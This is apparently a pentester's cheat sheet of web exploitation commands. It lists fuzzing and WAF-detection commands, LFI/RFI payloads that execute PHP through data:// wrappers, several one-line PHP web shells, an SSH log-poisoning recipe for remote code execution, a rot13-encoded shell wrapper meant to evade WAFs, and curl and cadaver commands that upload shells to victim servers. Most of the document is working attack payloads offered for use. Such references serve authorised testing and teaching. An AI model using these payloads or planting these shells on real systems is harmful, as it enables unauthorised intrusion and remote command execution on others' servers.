Web useful commands

{: .no_toc }

{: .no_toc .text-delta }

TOC
{:toc}

Quick References

Fuzzing

dirb http://10.10.10.56 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt
dirb http://10.0.0.10 -X .htm,.html,.php

wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/All_attack.txt http://10.0.0.10/test.php?file=FUZZ

Create wordlist

cewl –w /root/Desktop/words.txt –m 6  https://example.com

WAF detection

wafw00f http://192.168.56.102

Upload Files

curl -u <username:password> -T file_to_upload <Target_URL>
curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>

General Exploitation

LFI

Simple RFI

page=data://text/plain, <?php system("whoami");?>

Base64 encoded RFI

page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ3aG9hbWkiKTs/Pg==

lang=php://filter/convert.base64-encode/resource=index

Mini shell

page=data://text/plain,<?php system($_GET[cmd]);?>&cmd=id

Base64 + URL encoded mini shell

page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8%2B&cmd=id

RCE with LFI and SSH log poisoning

From

https://www.hackingarticles.in/rce-with-lfi-and-ssh-log-poisoning

ssh '<?php system($_GET['c']); ?>'@192.168.0.23

http://192.168.1.129/lfi/lfi.php?file=/var/log/auth.log&c=id

PHP shell WAF escape

Urlencode and rot13 encode

<?php

$enc = <<<ENC
__ENCODED PHP SHELL HERE__
ENC;

assert(urldecode(str_rot13($enc)));
?>

Use

<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
<?php $c=$_GET[‘c’]; echo `$c`; ?>

Insecure Methods

Methods Testing

nc <IP>

HEAD / HTTP/1.0
OPTIONS / HTTP/1.0
PROPFIND / HTTP/1.0
TRACE / HTTP/1.1
PUT http://Target_URL/FILE_NAME
POST http://Target_URL/FILE_NAME HTTP/1.x

TRACE

telnet www.victim.com 80
> TRACE / HTTP/1.1
> Host: www.victim.com

curl -k -s -i -X TRACE https://IP -H "Cookies: Reflected"

PUT

curl http://192.168.40.130/test/ --upload-file /root/Desktop/curl.php -v

curl --upload-file php-reverse-shell.txt -v --url http://192.168.40.130/test/shell.php -0 --http1.0

curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/tmp/some-file.xml" http://www.victim.com/newpage

curl -X PUT -d "text or data to put" http://www.victim.com/destination_page

curl -i -H "Accept: application/json" -X PUT -d "text or data to put" http://victim.com/new_page

cadaver http://<IP>/dav/
put /root/Desktop/shell.php

References

http://pentestmonkey.net

      White Papers
          Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
          Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
          Blind Security Testing - An Evolutionary Approach
          Command Injection in XML Signatures and Encryption
          Input Validation Cheat Sheet
          SQL Injection Cheat Sheet

Last updated 5 years ago

Was this helpful?

hashtagTable of contents

hashtagQuick References

hashtagFuzzing

hashtagCreate wordlist

hashtagWAF detection

hashtagUpload Files

hashtagGeneral Exploitation

hashtagLFI

hashtagRCE with LFI and SSH log poisoning

hashtagPHP shell WAF escape

hashtagInsecure Methods

hashtagMethods Testing

hashtagTRACE

hashtagPUT

hashtagReferences

Table of contents

Quick References

Fuzzing

Create wordlist

WAF detection

Upload Files

General Exploitation

LFI

RCE with LFI and SSH log poisoning

PHP shell WAF escape

Insecure Methods

Methods Testing

TRACE

PUT

References